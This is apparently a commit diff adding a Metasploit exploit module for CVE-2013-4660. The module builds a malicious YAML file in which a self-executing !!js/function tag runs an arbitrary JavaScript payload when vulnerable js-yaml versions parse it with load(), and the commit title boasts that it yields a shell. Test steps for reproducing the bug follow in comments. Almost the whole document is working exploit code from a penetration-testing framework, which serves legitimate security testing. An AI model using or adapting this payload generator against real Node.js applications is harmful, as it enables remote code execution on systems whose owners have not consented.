Module gets me a shell, yay

modules/exploits/multi/fileformat/nodejs_js_yaml_load_code_exec.rb

@@ -0,0 +1,59 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Nodejs js-yaml load() Code Exec',
+      'Description'    => %q{
+        For node.js applications that parse user-supplied YAML input using the
+        load() function from the 'js-yaml' package < 2.0.5, specifying a self-executing
+        function allows us to execute arbitrary javascript code.
+      },
+      'Author'         => ['joev <jvennix[at]rapid7.com>'],
+      'License'        => MSF_LICENSE,
+      'References'  =>
+        [
+          ['CVE', '2013-4660'],
+          ['URL', 'https://nealpoole.com/blog/2013/06/code-execution-via-yaml-in-js-yaml-nodejs-module/']
+        ],
+      'Platform'       => 'js',
+      'Arch'           => ARCH_NODEJS,
+      'Privileged'     => false,
+      'Targets'        =>	[['Automatic', {}]],
+      'DisclosureDate' => 'Jun 28 2013',
+      'PayloadType'    => 'js',
+      'DefaultTarget'  => 0))
+
+    register_options([
+      OptString.new('FILENAME', [ true, 'The file name.', 'msf.yml'])
+    ], self.class)
+  end
+
+  def exploit
+    p = payload.encoded
+    print_status("Creating '#{datastore['FILENAME']}' file...")
+    file_create("a: !!js/function >\n  function(){ #{p} }();")
+  end
+end
+
+# Test steps:
+#
+# sudo npm i js-yaml@2.0.4
+#
+# #!/usr/bin/env node
+# // save this file to parse.js
+# var yaml = require('js_yaml');
+# yaml.load('msf.yml')
+#
+# node parse.js